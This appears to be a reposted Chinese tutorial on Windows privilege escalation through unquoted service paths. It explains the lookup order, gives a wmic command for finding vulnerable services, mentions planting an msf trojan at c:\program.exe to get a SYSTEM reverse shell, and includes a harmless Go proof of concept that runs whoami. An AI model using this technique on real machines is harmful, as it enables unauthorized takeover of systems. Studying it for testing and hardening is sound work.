【WINDOWS提权】不带引号的服务路径提权——也比较鸡肋，需要安装后门替换服务后重启系统，你的后门服务才会起来，因为服务启动权限高，所以可以提权

【WINDOWS提权】不带引号的服务路径提权

from：https://www.freesion.com/article/68201384168/

一、漏洞原理

当系统管理员配置Windows服务时，他们必须指定要执行的命令，或者运行可执行文件的路径。

当Windows服务运行时，会发生以下两种情况之一。如果给出了可执行文件，并且引用了完整路径，则系统会按字面解释它并执行。但是，如果服务的二进制路径未包含在引号中，则操作系统将会执行找到的空格分隔的服务路径的第一个实例。

漏洞服务下载地址：https://www.exploit-db.com/exploits/40428

在这里插入图片描述
路径没有包含在引号中，服务会按照以下顺序依次执行

c:\program.exe
c:\program files.exe
c:\program files (x86)\grasssoft\macro.exe
c:\program files (x86)\grasssoft\macro expert\MacroService.exe

假如存在漏洞路径，我们可以将msf木马放到上面的路径下，然后重启机器，此时，反弹回来的shell，则是一个system的shell

使用以下命令查看系统中错误配置的路径

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

在这里插入图片描述

二、编译一个可执行程序

要求：

运行后执行系统命令whoami
在当前目生成一个.txt文件，内容为whoami的执行结果
程序命名为program.exe
程序执行后自动删除(以免影响正常服务启动)

package main

import (
        "fmt"
        "io/ioutil"
        "log"
        "os/exec"
)

func main() {

        //cmdOutput, err := exec.Command("python", "whoami").Output()
        cmdOutput, err := exec.Command("whoami").Output() // 执行系统命令
        if err != nil {
                log.Fatal(err)
        }

        err1 := ioutil.WriteFile("whoami.txt", cmdOutput, 0644)
        if err1 != nil {
                panic(err)
        }

        fmt.Printf("%s", cmdOutput)

}